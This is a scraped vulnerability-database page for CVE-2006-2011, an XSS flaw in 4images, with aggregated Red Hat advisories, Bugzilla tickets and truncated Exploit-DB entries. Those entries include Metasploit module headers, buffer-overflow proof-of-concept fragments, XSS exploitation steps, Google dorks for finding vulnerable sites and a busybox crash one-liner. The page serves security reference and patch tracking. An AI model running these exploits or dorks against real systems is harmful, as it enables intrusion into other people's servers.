CVE-2006-2011
published 2006-04-25CVE-2006-2011: Cross-site scripting (XSS) vulnerability in member.php in 4images 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP411low2.6CVSS 2.0
AVNACHAuNCNIPAN
EPSS
1.34%
67.8th percentile
Cross-site scripting (XSS) vulnerability in member.php in 4images 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the nickname, probably involving the user_name parameter in register.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 4homepages | 4images | — | — |
CVSS provenance
nvdv2.02.6LOWAV:N/AC:H/Au:N/C:N/I:P/A:N
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cqjg-ppxj-v4xr: Cross-site scripting (XSS) vulnerability in member
ghsa_unreviewed·2022-05-01
CVE-2006-2011 [LOW] GHSA-cqjg-ppxj-v4xr: Cross-site scripting (XSS) vulnerability in member
Cross-site scripting (XSS) vulnerability in member.php in 4images 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the nickname, probably involving the user_name parameter in register.php.
Red Hat
BSD compress LZW decoder buffer overflow
vendor_redhat·2011-08-10·CVSS 7.5
CVE-2011-2895 [HIGH] BSD compress LZW decoder buffer overflow
BSD compress LZW decoder buffer overflow
The LZW decompressor in (1) the BufCompressedFill function in fontfile/decompress.c in X.Org libXfont before 1.4.4 and (2) compress/compress.c in 4.3BSD, as used in zopen.c in OpenBSD before 3.8, FreeBSD, NetBSD 4.0.x and 5.0.x before 5.0.3 and 5.1.x before 5.1.1, FreeType 2.1.9, and other products, does not properly handle code words that are absent from the decompression table when encountered, which allows context-dependent attackers to trigger an infinite loop or a heap-based buffer overflow, and possibly execute arbitrary code, via a crafted compressed stream, a related issue to CVE-2006-1168 and CVE-2011-2896.
Package: busybox (Red Hat Enterprise Linux 4) - Not affected
Package: gzip (Red Hat Enterprise Linux 4) - Not affected
Package: mai
Red Hat
David Koblas' GIF decoder LZW decoder buffer overflow
vendor_redhat·2011-08-10·CVSS 7.5
CVE-2011-2896 [HIGH] David Koblas' GIF decoder LZW decoder buffer overflow
David Koblas' GIF decoder LZW decoder buffer overflow
The LZW decompressor in the LWZReadByte function in giftoppm.c in the David Koblas GIF decoder in PBMPLUS, as used in the gif_read_lzw function in filter/image-gif.c in CUPS before 1.4.7, the LZWReadByte function in plug-ins/common/file-gif-load.c in GIMP 2.6.11 and earlier, the LZWReadByte function in img/gifread.c in XPCE in SWI-Prolog 5.10.4 and earlier, and other products, does not properly handle code words that are absent from the decompression table when encountered, which allows remote attackers to trigger an infinite loop or a heap-based buffer overflow, and possibly execute arbitrary code, via a crafted compressed stream, a related issue to CVE-2006-1168 and CVE-2011-2895.
Statement: Vulnerable. This issue affects the versio
Red Hat
php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
vendor_redhat·2010-12-08·CVSS 7.5
CVE-2011-0752 [HIGH] php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
The extract function in PHP before 5.2.15 does not prevent use of the EXTR_OVERWRITE parameter to overwrite (1) the GLOBALS superglobal array and (2) the this variable, which allows context-dependent attackers to bypass intended access restrictions by modifying data structures that were not intended to depend on external input, a related issue to CVE-2005-2691 and CVE-2006-3758.
Statement: We do not consider this flaw to be a security issue as it is only exploitable by the script author. No trust boundary is crossed.
This issue did not affect the versions of PHP as shipped with Red Hat Enterprise Linux 3, 4, or 5 (php). This issue was addressed in the php53 packages as shipped in Red Hat Enterprise Linux 5 before t
No detection rules found.
Exploit-DB
CSF Firewall - Buffer Overflow (PoC)
exploitdb·2011-12-09
CVE-2011-5033 CSF Firewall - Buffer Overflow (PoC)
CSF Firewall - Buffer Overflow (PoC)
---
/*
############################################################################
# Exploit Title: CSF Firewall Buffer overflow p0c
# DownLoaD : http://www.configserver.com/free/csf.tgz
# Date: 2011-12-09
# Author: FoX HaCkEr
# site : www.sec4ever.com
# MaiL : [email protected]
# Tested on: CentOS3/4
############################################################################
FiLe : CSF.c
*/
/*
* Copyright 2006-2011, Way to the Web Limited
* URL: http://www.configserver.com
* Email: [email protected]
*/
#include
#include
#include
#include
#include
main ()
{
FILE *adminFile;
uid_t ruid;
char name[100];
struct passwd *pw;
int admin = 0;
ruid = getuid();
pw = getpwuid(ruid);
adminFile=fopen ("/usr/local/directadmin/data/admin/admin.list","r");
wh
Exploit-DB
RealVNC - Authentication Bypass (Metasploit)
exploitdb·2011-08-26·CVSS 7.5
CVE-2006-2369 [HIGH] RealVNC - Authentication Bypass (Metasploit)
RealVNC - Authentication Bypass (Metasploit)
---
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'RealVNC Authentication Bypass',
'Description' => %q{
This module exploits an Authentication Bypass Vulnerability
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
listener on LPORT and proxies to the target server
The AUTOVNC option requires that vncviewer be installed on
the attacking machine. This option should be disabled for Pro
},
'Author' =>
[
'hdm', #origin
Exploit-DB
BlogPHP 2.0 - Persistent Cross-Site Scripting
exploitdb·2011-08-09
BlogPHP 2.0 - Persistent Cross-Site Scripting
BlogPHP 2.0 - Persistent Cross-Site Scripting
---
# Exploit Title: BlogPHP v2 - XSS
# Google Dork: "Copyright ©2006 Powered by www.blogphp.net"
# Date: 09/08/2011
# Author: Paul Maaouchy( Paulzz )
# Software Link: http://sourceforge.net/projects/blogphpscript/files/blogphpscript/2.0/BlogPHPv2.zip/download
# Version: v2
# Tested on:
# CVE :
How to exploit:
1- Go there : http://localhost/blogphp/register.html.
2- Put in the Username field the XSS Code. Example: .
3- Put anything in the other field ( Password & E-mail).
4- Now anyone go there : http://localhost/blogphp/members.html will redirected to google.com OR exploit your XSS Code.
Paul Maaouchy ( Paulzz )
Contact me
@ [email protected]
@ [email protected]
@ [email protected]
Exploit-DB
Oracle HTTP Server - Cross-Site Scripting Header Injection
exploitdb·2011-06-13·CVSS 4.3
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
Oracle HTTP Server - Cross-Site Scripting Header Injection
---
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Exploit-DB
Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)
exploitdb·2011-06-02
CVE-2006-6576 Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)
Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)
---
#
# $Id: goldenftp_pass_bof.rb 12812 2011-06-02 01:10:22Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GoldenFTP PASS Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the Golden
FTP service. This module uses the PASS command to trigger the overflow.
},
'Author' => [ 'bannedit' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12812 $',
'References' =>
[
[ 'BID', '45957 '],
[ 'URL', 'http://www.exploit-db.com/exploits/16
Exploit-DB
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)
exploitdb·2011-03-05
CVE-2006-6184 Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)
---
##
# $Id: attftp_long_filename.rb 11882 2011-03-05 21:00:57Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Allied Telesyn TFTP Server 1.9 Long Filename Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a
request (get/write) for an overly long file name.
},
'Author' => [ 'Patrick Webster ' ],
'Version' => '$Revision: 11882 $',
'References' =>
[
['CVE', '2006-6184'],
['OSVDB', '11350'],
Exploit-DB
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)
exploitdb·2011-02-23
CVE-2006-2961 CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)
---
##
# $Id: cesarftp_mkd.rb 11799 2011-02-23 00:58:54Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Cesar FTP 0.99g MKD Command Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.
You must have valid credentials to trigger this vulnerability. Also, you
only get one chance, so choose your target carefully.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 11799 $',
'References' =>
Exploit-DB
Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
exploitdb·2011-02-17
CVE-2006-3439 Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
---
##
# $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Server Service NetpwPathCanonicalize Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function
using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
other RPC calls could be used to exploit this service. This exploit will result in
a denial of
Exploit-DB
Golden FTP Server 4.70 - 'PASS' Buffer Overflow
exploitdb·2011-01-23
CVE-2006-6576 Golden FTP Server 4.70 - 'PASS' Buffer Overflow
Golden FTP Server 4.70 - 'PASS' Buffer Overflow
---
#GoldenFTP 4.70 PASS Exploit
#Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
#Tested on XP SP3
#Vendor Contacted: 1/17/2011 (no response)
#For this exploit to work correctly, you need to know the subnet that the server
#is running on. You also need to make sure that "show new connections" is checked in the options.
#The total length of the buffer should be 4 bytes less than the offset, with EIP at the end.
#528 is the offset when server running on 192.168.236.0
#533 is the offset when server running on 10.0.1.0
#530 is the offset when server running on 192.168.1.0
#531 is the offset when server running on 172.16.1.0
require 'net/ftp'
#Metasploit bind shell port=4444 | shikata_ga_nai | 369 bytes
shellcode = ("\
Bugzilla
CVE-2011-4082 phpldapadmin: local file inclusion flaw fixed in 0.9.8 [epel-4]
bugzilla·2011-10-27·CVSS 7.5
CVE-2011-4082 [HIGH] CVE-2011-4082 phpldapadmin: local file inclusion flaw fixed in 0.9.8 [epel-4]
CVE-2011-4082 phpldapadmin: local file inclusion flaw fixed in 0.9.8 [epel-4]
epel-4 tracking bug for phpldapadmin: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes
in the 'blocks' bugs.
[bug automatically created by: add-tracking-bugs]
Discussion:
The bug was fixed upstream in 0.9.7 .
EPEL4 has 0.9.8.3 at least several years.
Moreover, the first phpldapadmin version appeared in Fedora at all was 0.9.7 .
What the reason of this bug ticket?
---
Sorry, surely fixed in 0.9.8
Anyway, 0.9.8.x should be in EPEL4 since 2006 ...
---
The report indicates it was fixed in 0.9.8.5, and we have 0.9.8.3 in EPEL4, so I don't believe it is fixed in EPEL4.
---
> The report indicates it was fixed in 0.9.8
Bugzilla
CVE-2006-1168 busybox: uncompress buffer underflow
bugzilla·2011-08-05·CVSS 7.5
CVE-2006-1168 [HIGH] CVE-2006-1168 busybox: uncompress buffer underflow
CVE-2006-1168 busybox: uncompress buffer underflow
Description of problem:
busybox embeds (n)compress code in its libunarchive/libarchive. This embedded copy has not been patched for the following bug:
https://bugs.gentoo.org/show_bug.cgi?id=141728
http://ncompress.git.sourceforge.net/git/gitweb.cgi?p=ncompress/ncompress;a=commitdiff;h=e21aad4a5a3ba0b6c2279b28a80f85b0b226a175
Steps to Reproduce:
$ perl -e 'print "\x1f\x9d\x90","\x01"x"2048"' | busybox uncompress
Segmentation fault
Discussion:
bss or heap, depending on the version, it seems.
---
Fixed in upstream git:
commit 251fc70e9722f931eec23a34030d05ba5f747b0e
Author: Denys Vlasenko
Date: Thu Aug 18 14:29:41 2011 +0200
uncompress: fix buffer underrun by corrupted input
Fix for the latest release:
http://busybox.net/download
Bugzilla
libpng10, libpng: Memory leak by write of iCCP chunk with negative embedded profile length (CVE-2006-7244, CVE-2009-5063)
bugzilla·2011-03-23·CVSS 5.0
CVE-2006-7244 [MEDIUM] libpng10, libpng: Memory leak by write of iCCP chunk with negative embedded profile length (CVE-2006-7244, CVE-2009-5063)
libpng10, libpng: Memory leak by write of iCCP chunk with negative embedded profile length (CVE-2006-7244, CVE-2009-5063)
A memory leak was found in the way libpng, PNG image format files
manipulating library, processed image files with negative length
of embedded International Color Consortium (ICC) profile chunk.
A remote attacker could provide a specially-crafted JPEG image
format file and trick the local user into opening it with an
application linked against libpng, which would result in
denial of service (excessive memory consumption or that particular
application crash).
References:
[1] http://www.openwall.com/lists/oss-security/2011/03/22/7 (CVE Request)
Discussion:
As noted in [1]:
i), the bug was introduced in 1.2.13beta1:
http://libpng.git.sourceforge.net/git/gitweb.cgi?p=l
http://secunia.com/advisories/19745http://www.osvdb.org/24796http://www.securityfocus.com/archive/1/431599/100/0/threadedhttp://www.securityfocus.com/bid/17625http://www.vupen.com/english/advisories/2006/1449https://exchange.xforce.ibmcloud.com/vulnerabilities/25987http://secunia.com/advisories/19745http://www.osvdb.org/24796http://www.securityfocus.com/archive/1/431599/100/0/threadedhttp://www.securityfocus.com/bid/17625http://www.vupen.com/english/advisories/2006/1449https://exchange.xforce.ibmcloud.com/vulnerabilities/25987
2006-04-25
Published